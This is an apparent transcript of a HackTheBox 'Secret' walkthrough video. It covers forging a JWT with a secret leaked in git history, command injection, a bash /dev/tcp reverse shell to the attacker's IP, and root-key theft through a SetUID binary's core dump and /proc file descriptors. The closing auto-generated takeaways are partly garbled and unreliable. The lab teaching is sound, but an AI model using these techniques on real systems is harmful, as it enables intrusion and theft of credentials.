HackTheBox - Secret

IppSec · Beginner · 🔧 Backend Engineering · 4y ago

Key Takeaways

The video demonstrates how to exploit vulnerabilities in a web server running Node.js with the Express.js framework, using tools like nmap, curl and Burp Suite, to gain root access on HackTheBox - Secret. It covers topics such as API security, JWT token authentication, and file descriptor manipulation.

Full Transcript

What's going on YouTube, this is IppSec. We're doing Secret from HackTheBox, which is all about secret ways to extract information from applications. It starts off with a web server running Node.js, specifically the Express.js framework, and it's pretty bare: it's just an API with some documentation so you can play around with the API, create users and understand how it works, and pretty much get the impression that it just uses JWT tokens to authenticate users. There's also a link to download the source code, and inside of that source code is a .git directory that exposes previous commits with the secret key used to sign JWTs, so you can forge a token, become an admin user. There's an endpoint on the app that allows for RCE, get a shell on the box, and then look around on it, find a custom SetUID file and its source code. Essentially what it does is opens a file and then shows you how many lines, words and characters it has, and it allows you to do a crash dump, so you just open the file, kill the application with a segfault and then read the crash dump. So with that being said, let's jump in.

As always we start off with the nmap: -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call it secret, and then the IP address of 10.10.11.120. This can take some time to run so I've already ran it. Looking at the results we have just three ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80. Its banner tells us it's nginx running on Ubuntu and we have the HTTP title of DUMB Docs. Then we also have HTTP on port 3000; it's running Node.js, the Express middleware, which is a framework for Node.js, and its title is also DUMB Docs. So both of these are identical. This can tell me a lot of things: most likely it's probably the same thing and nginx is just being a reverse proxy to Node.js, and Node.js, instead of being configured to listen on 127.0.0.1, was configured on all hosts so you can access either interface. Typically when you set up a server you'd want to configure whatever the application is to be listening on a file descriptor and not a TCP socket, because TCP does add the overhead of the three-way handshake: if you access it on nginx you do a three-way handshake to nginx, and it's a reverse proxy over to port 3000 and it does another handshake over 127.0.0.1, and that just adds extra time. So it's really better to configure it with a file descriptor so you don't have all that extra overhead and it's a little bit quicker. The other thing, this could just be Node.js running in a Docker and nginx pointing to it; this could be a development version, this could be the production version, so we probably should check out both if we get stuck, because one may have different features than the other. And then finally, maybe there's some weird bug where if nginx is sitting in front of Node.js it opens up some exploit attacks, like if this was port 8080 and Tomcat and they both had the same things, I would be trying that Tomcat server-side request forgery to access the management interface. But at this point I'm thinking I've probably overthought it. I'm just explaining all the things that go through my head, and we should just go take a look at the actual application before we start theorizing exactly how to attack it.

So we go to 10.10.11.120, we get DUMB Docs on this page, check out 3000 as well, and it looks like they are identical, so nothing too interesting here. I do notice we can download source code, so we probably should do that, and there's also, let's see, GitHub links. This is not there. We have a live demo that does go to a 404. Introduction, looks like we have documents. So all these links go to /docs and they're just at different pages. So if we send a POST request to /api/user/register it gives us the user, so let's try this real quick. I'm going to open this up, send this, I wish I'd turned intercept on. We want to convert to a POST request, I'm just going to change request method, we hit, what is it, /api/user/register, and then it wants us to send this JSON body. I'm going to change, actually we won't change it first, let's see what we get. I'm guessing I'm going to error because we're saying it's URL encoded and we're passing JSON, but let's just see what happens. 404. I'm going to try changing this to be JSON, still a 404. Did I type that... I don't know how I missed that 'e'. See, we send this, 'email already exists'. So if I do root@ipsec.rocks and I do the user ipsec, and what was this, I want to do this just to see if this would work; it says 'name is required'. So Node.js isn't processing this because it's expecting it as name=&email= like that when you do x-www-form-urlencoded, so let's change this over to JSON. The content type is extremely important. And we create the user ipsec. So if I look at this it tells us, yep, that is exactly it. There is a login, so what I'm going to do, I'm going to double click up there, 'create user', and then I'm going to try a login request. So I'm going to do /login and then we can just change that to be ipsec@ipsec.rocks, delete that, ipsec@ipsec.rocks, 'email is wrong'. I type in my name 'ipsbeck' or 'ipspec' maybe, does it know my email is wrong? Oh, root@ipsec.rocks, it's been a long day. So we get this token back. So now what does the JSON say? If you get the auth token it should look like this. Awesome, and we can go over to jwt.io and see what it is.

So jwt.io, let's turn Burp Suite off, there we go. We can copy this token, paste it in, and we see id, name, email, iat. So the very first thing I'm probably going to try, we can say this one is login, what was it, admin@... actually instead of saying email I'm going to try name. Can I just log in with a name? Because a lot of times APIs will make things interchangeable, they may not tell you, but no, 'email is required', so we can't log in with the name and we don't know the admin's email. If we look at DUMB Docs I don't see anything that would leak an email. Oh, it says 'email me' and then it goes nowhere, so we don't have an email address. But we did download the source code, so I'm going to mv ~/Downloads, and what did we download it as, files.zip, to our current directory. Let's mkdir source and we can unzip files.zip, and oh, I saw a lot of things. One thing that did stick out was a .git directory, so we can look at the git commits, but first I'm just going to run Codium and we're going to take a look at this application. So File, Open Folder, local-web, we're here. We can look at .env, we have a token secret of 'secret'. We can take a look at our jwt.io, and right now this is the payload that came from the web server. If I put in 'secret' we can see 'signature verified', I did not expect that. Let's see, oh, this is creating the secret, I thought this would be testing it. So we can try the secret of 'secret' and send this back to the endpoint. Let's see, I don't know how to exactly do this. If you're not an admin... somebody hit /api/priv, we should be able to log in. So let's go here and then make another one and call this priv, and this is, let's see, a GET request to /api/priv. So I'm going to change the request method, do /api/priv, we get 'access denied'. We can do the normal JWT thing of Authorization: Bearer <the JWT token>, 'access denied'. If you're admin you will get..., if you're a normal user I should get 'I'm a normal user', so something is wrong here. So let's take a look at the source to see exactly how this is going, or maybe I copied the wrong thing.

But looking at index.js we can see the priv route is defined here, we got where the downloads is, but here where it says app.use, this is how it actually maps everything. So we can see /api/user is mapped to authRoute, which is routes/auth, so if we go to routes/auth we have everything here. So we hit this register endpoint, we've hit this login endpoint, and let's see, upon logging in we do validation, findOne, it wants us to set a header of auth-token. It looks like, let's see, priv, request, send name, see verifyToken, let's go to this function, and yeah, it's using the header auth-token. So it's not using the standard JWT header, it's using auth-token. So let's try this, and we get 'invalid token', which is fine. So I'm going to copy this token, go here, paste, and I'm a normal user. So now that token probably came out of here, so let's see, came out of here, I was looking at the screenshot JWT. So I'm trying to paste the secret of 'secret' here, and when we do this we get 'invalid token', so we have the wrong key. We did have a .git directory, so I can do git log and we can see 'removed .env for security reasons', so if I do git show on this commit we can see what the token is. So I can copy this, we go back over here, let's change 'secret' to be the new thing, and I probably have to base64 encode this because this is definitely a base64 encoded string. Let's see, it is. So if the thing doesn't work I'm going to click the base64 and go and try again. We should have... so get rid of that line break, send. Oh wait, we need two line breaks after a GET request, there we go. So now we can change anything. So it says 'I am a user normal', description 'ipspec' because I can't type, but if I change the name to 'please subscribe' we can now become this user, we see the description 'please subscribe'. So if we go back to the endpoint, private.js, it is hard coding the name 'theadmin', so if I change the name to 'theadmin' it should tell me 'welcome back admin'. So I'm going to try this name 'theadmin', copy the secret, paste it in here, and it says 'welcome back admin'.

So let's just take a look through this code. So we have a few routes, /api/user, /api and /. So I'm going to take a look at privRoute because we've already dug through this auth function and we can now become any user we want, so authenticating isn't a thing for us anymore. And if an application ever uses JWTs and you do a pen test, you extract the source code, definitely recommend they rotate those keys, because there have been times when I do engagements, I say rotate this key because it's been leaked, I go back for the next engagement, they don't, and I just go back to my notes, pull the key and, like, oh, you patched everything I said, but you didn't prevent me from just being able to forge my own token. So this was a pretty quick test, right, because I just instantly forged my way back in as an admin. So this is forgot, but forgot doesn't look like it's really that interesting. I think GET /priv, if the name is admin, description path to binary, what is that? I'm going to try that real quick. So forgot.js, what loads this? forgot, not there, probably an auth, right. GET /priv, what was this, /api/priv, is that this, am I hitting that? Let's see, Edit, Find in Files, /priv, let's see, index, forgot, private. So this is what I'm hitting. I don't know what this forgot.js is. Edit, Find in Files, forgot.js, I don't know if anything's actually calling this. This may just be a dead file because I'm looking at files looking for forgot.js and nothing includes this. So let's go to the next one, private.js. So we have this private endpoint, nothing interesting there. There is a logs endpoint, and if we look at this we have: if name is 'theadmin', that's going to do a getLogs and do a git log --oneline and file. We look at what defines file, it is req.query.file, so this is coming from the client, this is our HTTP request. So it's getting our query of the parameter named file and then passing it over to exec. So exec, just like shell, it's executing bash: git log --oneline <user input>. So this should be trivial to get code execution on.

So let's see, where do we have priv, so I'm just going to change this, we're going to move this over here, I'm going to call this log and we get /api/log endpoint, let's see, file=test, see, is it /api/priv/log, oh, /logs, there we go. So we see command git log --oneline test. So if I do id, there we go, we have now executed id on this box. So the next thing to do is send a reverse shell. So I'm going to go up a directory, so we're back here, and then I'm just going to run script shell.out, and all this is gonna do is send all my reverse shell output to this file so I have a good log of things I did, and I'm gonna do nc -lvnp 9001 and let's do echo -n 'bash -c bash', actually I'm going to send this in base64. So we just do bash -i >& /dev/tcp/10.10.14.8/9001 0>&1 and then base64 -w 0, and what I want to do is get rid of this plus and these equals. So I'm going to think the plus comes right after this -i and just add a space there, and we've changed that. We want to get rid of this plus now, that's probably going to be right around here, and there we go. And the reason why I was getting rid of those pluses is because plus in a URL is also space, so it can be a bad character, and I just like avoiding as many bad characters as I can. So if I do echo -n, paste this, pipe it over to base64 -d, I think, if I just pipe it over to bash, and we highlight this, Ctrl+U to URL encode that, you can see the spaces were converted to pluses. So if I left the plus in my base64 it would treat it as a space, which is not good. We send this, it got killed and did not send us the shell, huh. Let's see, I'm going to Ctrl+U to get back to where we were, doesn't seem to be working. I'm just going to Ctrl+Shift+U and I'm going to paste this and see if I get a callback. I don't, and I realized base64 -w 0, or base64 -d to decode it, the things you forget sometimes. Still does not work, so let's copy this, go here, paste it. Why do I have two? I should not have two there, so there we go, that works. Let's just make sure I did not have two in Burp Suite, so paste, Ctrl+U, and see, nc -lvnp 9001, send it. Let's see, I don't know where they had an equal at the end, there we go, and now we have a reverse shell. I'm not sure exactly what I did, it looked like I had a key and converted this whole thing to base64. Is that a thing, base64? I probably hit Ctrl+B and converted, because I saw the equal there and was like, wait, I was going away from bad characters, why do I have that? So that's probably what I had done there, but we have a reverse shell now.

So let's do python3 -c 'import pty; pty.spawn("/bin/bash")', like that, stty raw -echo; fg, and then let's see, we can export TERM=xterm and we have just a good reverse shell. The very first thing I notice here is we exploited a web service and we're now a user, which is bizarre, but because we're a user I can just grep dasith /etc/passwd and we see I do have a shell of /bin/bash. So I didn't have to do all this reverse shell thing because I could just go into my home directory and then we mkdir .ssh and drop an authorized_keys file here. So if I just do ssh-keygen -f dasith and we cat dasith.pub we can grab our key, and vi authorized_keys, paste this in, and then chmod 600 dasith and ssh -i dasith dasith@10.10.11.120, and we gotta say dasith again for the user, so we use his key here and now we're using him to log in, and there we go. So now we have an even better shell that's more reliable; if we get kicked off we can just get back in. The downside is if I run a w command I can see I'm logged in, but on the flip side if you do like a ps -ef --forest you can see the reverse shell also sticks out, so both ways are neither stealthy. If you want to be stealthy you probably have to execute a binary on the box, and these videos don't really focus on stealth, so let's just go on.

Let's see, the very first question I have is port 80 versus 3000, is there a difference? So I'm going to go to /etc/nginx and then let's go to sites-available, look at default, and let's go to the configuration. We can see location /, so everything on this server is just going to be proxy passed to localhost:3000, so they're the same exact application. Now, I guess like I said before, the Node.js application should be listening on localhost. It's configured to go to 127.0.0.1, but I bet if we do ss -lntp we can see it's listening on all hosts. So probably how they're using to persist this Express application on boot should be coded to listen on localhost. If I had a guess they're using pm2, because that's just generally what Node modules do. Yeah, we have pm2 here. Let's see, I don't know exactly where to go, there's a binary somewhere, pm2 -h, see, is there a list, I really don't know exactly what I'm doing here. There's a config that you could do with pm2 to make it listen on localhost, but that's not important. I'm going to go run LinPEAS, and I've already opened up the GitHub page to this because I was looking at it, and LinPEAS did change to also include a binary, so we can either just download the .sh script or we could execute it as a Go-linked binary. If I copy this link, we go, let's see, mkdir www, we can wget this and we can also wget linpeas.sh, and this is just different ways to execute LinPEAS. You still got the bash script that does everything, but there is this linpeas_linux_amd64 that is just a Go binary that executes linpeas.sh. So I'm going to do the ELF binary just because, there's really no reason why I'm going to choose to do that other than I want to see this, right. So I'm going to wget, let's go /dev/shm, wget 10.10.14.8:8000/linpeas_linux_amd64, chmod +x, and we will execute this. I'm just going to run a time command here so it tells me how long it took for it to run. Generally it can take anywhere from like one to five minutes, so I'm just going to run this and I will resume the video when it's done.

And not even two minutes later we have the file completed, so I'm just going to go to the top of my output and let's go over what LinPEAS says. So the very first thing is I see something highlighted, 'vulnerable to CVE-2021-4034', which is under sudo. So if I grab the... not grep, but Google the CVE, we can see it is PwnKit. So it's kind of weird that it's listed under sudo, and I don't know a good way to check for PwnKit other than exploiting it, but I'm 99% sure that was patched, so I'm just going to move on, because I remember when PwnKit was released we went back and patched all active machines, so that's why I'm not going down that route. The main issue with it detecting it probably is it's depending on the pkexec version, and for some reason with PwnKit the creators of pkexec or polkit didn't update the version numbers, so even if you do a pkexec --version to show the version number, it's both vulnerable and not, it's really hard to test for that vulnerability without actually exploiting it, so that's probably why it went off. That was processes, cron jobs, we see it's highlighting dasith, but this is @reboot, so upon rebooting the machine it's going to start the pm2 thing under dasith, so nothing interesting there. systemd, path, socket files, sockets listening, D-Bus config, I'm just looking for highlighted things until we get to an interesting section. We see logons, software information, wget, it's only highlighted because that's how I was getting to the top of the output; you can see one result here. I don't want to Ctrl+C because I may kill my whole... like, go to the bottom of the output, so that's why that was highlighted. Let's see, nginx, FastCGI, rsync config, nothing looks interesting, still nothing interesting, tmux sessions, it checks for a lot of things. Looking at GitHub files, we've already looked at those, cache, bind, that's DNS. Interesting files, SetUID, these are always good to look at. So pkexec, we already talked about that one, sudo, passwd, there is /opt/count, which is an unknown SetUID binary, so chances are we should look at /opt/count. Just looking through the rest of these to make sure there's nothing, but if I go into /opt we can see there is a count binary and we also have code.c, which I'm going to guess is the source to this.

If I execute count, 'enter source file or directory name', I'm going to do /etc/shadow and we see it's counting everything. 'Save the results?' If I do yes, path, let's do /opt, I'll call it ipsec, 'could not open /opt/ipsec for writing'. Let's touch ipsec, or touch /tmp/ipsec, let's try this again. Let's do /etc/shadow, it's counting characters, words, lines, we save it to /tmp/ipsec, cat /tmp/ipsec, oh, it's just saving those results. So I just want to try this one more time, I should have looked at the owner of /tmp/ipsec, if it changed. Actually, no, never mind, the owner wouldn't change because I created the file. /etc/shadow, save the results, /tmp/ipsec. So when it's writing this file, it's interesting, it obviously has a setuid call so it can read shadow, because it gets words and lines. We could probably get total characters if we just do like ls -la on /etc/shadow, 1187, so the total characters isn't interesting because we could pull that anyway, but the words and lines is interesting because it has to use a setuid call to get up to their permission to be able to see that. But then when it writes the file it gets rid of that setuid call, so we can't write anything. So let's take a look at the source code, so code.c, and let's see, is dir, is link, so this is just opening the file, closedir, let's see, filecount and main, scanf, so it's enabling the ability to do a core dump. So if we start this and then use a kill command to kill the process with like a segfault, then it should write the core dump and we get the data, because that's what this is doing.

So I'm going to try that real quick, let's do count and I'm going to kill it from my reverse shell. So let's do /etc/shadow, first I have to type it correctly, and then let's see, kill -h, let's see, 'kill linux create core dump', ulimit -c, let's see, -3. So ps -ef | grep count, kill -3 the PID, and it quit and it says 'core dumped', so now we just have to find where the dump is. It's probably, let's see, /var/crash maybe, yep, /var/crash. Now can we read the crash log? cd /var/crash, see, is that me? I don't think that's me. I don't know what I'm doing, I just want to run a date to look at the box. So let's see, those were created October and it is not October, so that's probably testing the box. Would it write that crash to... find / 2>/dev/null | grep crash, see, core, grep dump, man, that's a lot of stuff. I really think it would go in /var/crash but there's nothing recent there. Let's do a man on kill, maybe we did it wrong. Let's see, we have list, yeah, let's do kill, because we have different numbers we can do like 9, kill -l 11 will translate 11, I didn't even know there was an 11. Let's just do kill -L so we can see everything. So we did a SIGQUIT, so we just told it to quit, we didn't actually crash it. So I'm gonna try 11 to segfault it. Normally I just do the 9 to kill it, but you can see there's a lot of other ways you can terminate a program. So I'm going to ./count /etc/shadow, we read it, now let's do ps -ef | grep count, kill -11, and we can kill this process. We see segfault, ls -la /var/crash, there we go, we have a new crash and we can read it. So if I go into /var/crash we do file, you can see it's ASCII text, so I wonder if I grep root out of this. _opt_count.1000.crash, what is this crash dump? ProcMaps, there's a lot of base64 here, so this is a crash report. Let's see, apport-unpack, so we're gonna unpack the crash report, and target directory, let's just do /dev/shm, mkdir /dev/shm/report, we can dump it there, and now if we go here, it did all the base64 undoing for us, so we have the CoreDump, the architecture, executable path, like this is everything that would go in a dump that would get sent to Ubuntu to help. So if we grep root out of CoreDump, -a because it's a binary file, we could get the SSH key, or not, the encrypted password for root. So now we have a way to read files.

So what I'm going to do is we're going to check if the SSH key for root exists, so we can do ./count, 'enter source or directory name', let's do /root/.ssh/id_rsa. It does exist, because we can see it's 45 words, 39 lines, and before we save it to a file, ps -ef | grep count, kill -11 361014, there we go. Go into /var/crash, mkdir /dev/shm/report2, let's do this unpack thing again, _opt_count.1000.crash, sounds good, let's just put it in report2 and let's go. Okay, just less CoreDump and we see, we can do our strings on CoreDump | less, let's see, BEGIN, there we go. So all you have to do is copy this, so do this to out, or let's do grep BEGIN on out -A 10, oh, how many lines was it, lines 39, so we can say -A 39, and I guess it had two extra so let's do 37, there we go. We can say this is root.key. If I look at it we have BEGIN, we have END, so I should be able to just chmod 600 root.key, ssh -i root.key root@localhost, and we could export this key back to our box and do it that way as well. Yes, and we have rooted Secret.

Now there was another thing we could have done with this binary, because it is set up as it is. Let's go back to code, so cd /opt, code, we can execute count, let's do /root/.ssh/id_rsa and we can go into /proc, and let's do a ps -ef | grep count, we want to go into this directory, 61216, and then if we go into fd for file descriptor and we cat, let's cat the last one, permission denied, cat 2, cat 1, cat 0, I thought that would work. cat 3 is pointed to /root/.ssh/id_rsa, let's see, I thought we could have read that, permission denied. So I guess maybe this only works if we own the file in this directory. So if we created a file in /root and we were the owner of it but we couldn't access it because we didn't have permission to /root, but if we get a file handle open to that file then we could access it this way, I believe. I do want to try something else. I did recently learn that we can dd things out of memory. I don't know if this is a root privilege thing or not, if we own it, so I'm just going to try it real quick. I'm assuming this isn't going to work, but just experimenting here. So let's cat maps and I want to look at the heap, so grep -i heap, there we go, and I'm going to try to extract this piece of memory, because this is also where the contents of that file is going to be. So I'm going to do dd, if for input file, and there is inside of this /proc directory a file called mem which is just a symlink to it, and I really doubt this is going to work without root privilege, but let's try. if=mem bs=1, we can skip, like, everything here, so let's copy this 0x, so we're skipping to this spot in memory, and then we're going to count this spot minus the other one. I need to do, oh god, where's my cursor, new tmux, that sucks, there we go, darn tmux, oh this is going to suck. Let's see, stty -a, let's do rows 26 columns, one of 24, 105. stty rows 26 cols 105, yep, there we go. So now I don't have that bug where my cursor jumps, because this one I'm in is a reverse shell, this is the SSH, so I just had to fix that piece of my shell. So we got this one, let's go here, 0x like this, then output file of=/tmp/heap, let's see this fail, yeah, permission denied. If we were root we would have been able to do that.

So I just want to see something real quick, let's do that SSH, we wrote the key to what, /dev/shm/report2. If we ssh here, so I'm going to touch ipsec, or chown dasith:dasith ipsec, so we have the file ipsec in here. I'm going to echo 'please subscribe' to the file, so now dasith owns this file in /root, and I'm guessing we could have done it with like .profile as well because that's world readable; .bash_history isn't, so we probably could have dealt with .profile, we'll see. So cat /root/ipsec doesn't work, we don't have the ability to go into the /root directory. So if I do the count thing again and we do the source, let's do /root/ipsec, ps -ef | grep count, then cd /proc/61446, cd fd, we can see there's a handle to /root/ipsec. So if I try to cat /root/ipsec I can't, but if I cat this file handle I can, and the reason why is this application did not close the file yet. Let's try, was it /root/.profile, /root/.profile. So we see the file handle is open, we have to go back to the directory, cd /proc/6..., /proc/61452, cd fd, we can see that file handle. If I try to cat /root/.profile I can't, but if I cat 3 I can, because I do have permission to read the file, I just don't have a file handle to it, and the C code is doing a setuid, let's see, setuid, it's doing a setuid so it can get a file handle open to that file. So think of it like this: this file descriptor thing, well it just went away because I closed the file, it's pointed to specific spots on the disk, I guess, and because it's pointed to the spot on the disk I no longer need to know the root folder, like I didn't know, no need to, oh my god I can't talk. No longer need to traverse into the /root folder to find out exactly where on the disk the file exists, because I have the handle to it. So that is why that thing works. Maybe you learned something through file descriptors, maybe I just completely overcomplicated it, I don't know. But yeah, that's another potential thing of this. I don't know if there's anything sensitive in the root directory that you could have used to abuse it. So if I do, let's see, /dev/shm/report2 and we do that SSH again, I really don't think there's anything interesting in this directory that we could abuse. root.txt isn't 777 so we couldn't just steal that.

Another thing, let's see, let's go into /opt, let's just do ./count real quick and under the source I'm going to do /root/root.txt, 33 characters. I probably should do /etc/passwd because this is just going to be a random MD5 sum and going through the heap is going to be a pain to find that. So we're doing shadow, we have it open, this should exist in my program's heap right now. So if I do a ps -ef | grep count, we can go /proc/61597, then let's do grep heap on maps and let's try this dd command again. So dd if=mem bs=1 skip=, we want to skip this, so copy 0x, so now we're at this spot in memory, then we can say count= the ending size minus the beginning size, then we just do of=/tmp/heap. So now since I'm root I should have privilege to do this. If I put a backslash x here, there we go, so now we wrote the heap. cat heap, we now also have the passwd file here, so just like the core dump we can see the output of it, some memory stuff, and then shadow. So that will be the video. I hope you guys enjoyed it, take care and I will see you all next week.

Original Description

00:00 - Intro
01:04 - Start of nmap, talking about seeing two ports having the same HTTP Banner
03:20 - Checking out the webpage to discover source code and some docs
04:00 - Always RTFM. Playing with the API to register a user, login, and check out privilege level.
05:50 - Renaming our Burp Repeater tab by just double clicking on the number
07:30 - Trying to login with a name instead of email
10:10 - Testing our login token to find out it uses JWTs in a non-standard way
10:50 - Analyzing the source code to see the token is used in a header called "auth-token"
12:40 - Looking at git commit history to see there is a hard coded secret in an older commit and forging a token
13:40 - Changing our token's user, going back to the source code and seeing "theadmin" is a hardcoded administrative user
14:30 - Talking about the importance of rotating secrets in a web application
16:30 - Analyzing the private.js which shows a logs endpoint that is vulnerable to RCE
17:50 - Testing command injection and getting a reverse shell
22:00 - Noticing we are a user on the box, seeing our shell is /bin/bash, dropping an SSH Key for a second way into the box
23:40 - Checking NGINX Configuration to see if there is any difference between the two websites (port 80 and 3000), there isn't.
25:20 - Running LinPEAS, discovering a custom SetUID Binary called count
30:00 - Running the custom count binary against /etc/shadow, discovering it can read files as root, but not write files as root
31:57 - Examining the source code, to discover it allows for dump files to be created
33:15 - Failing to kill the linux process with the correct signal
34:50 - Pulling up the man page to kill and listing all signals, then killing the process with a Segfault (11)
36:40 - Using apport-unpack to extract the crash report into readable files
37:23 - Examining the coredump to discover the file read is there! Then doing the same thing with an SSH Key to get root on the box
40:00 - Showing how file descriptors (/proc/pid/f

This video teaches how to exploit vulnerabilities in a web server running Node.js with Express.js framework, using tools like nmap, curl, and burp suite, to gain root access on HackTheBox - Secret. It covers topics such as API security, JWT token authentication, and file descriptor manipulation.

Key Takeaways
  1. Run nmap with default scripts to enumerate versions
  2. Send a POST request to api/user/register to create a user
  3. Use JWT token to authenticate and access privileged routes
  4. Manipulate file descriptors to access files without root privileges
  5. Use the /dev/shm crash report to find sensitive information
  6. Abuse root.txt to access the password file
💡 The video demonstrates how to use file descriptor manipulation to access files without root privileges, which is a key concept in exploiting vulnerabilities in web servers.
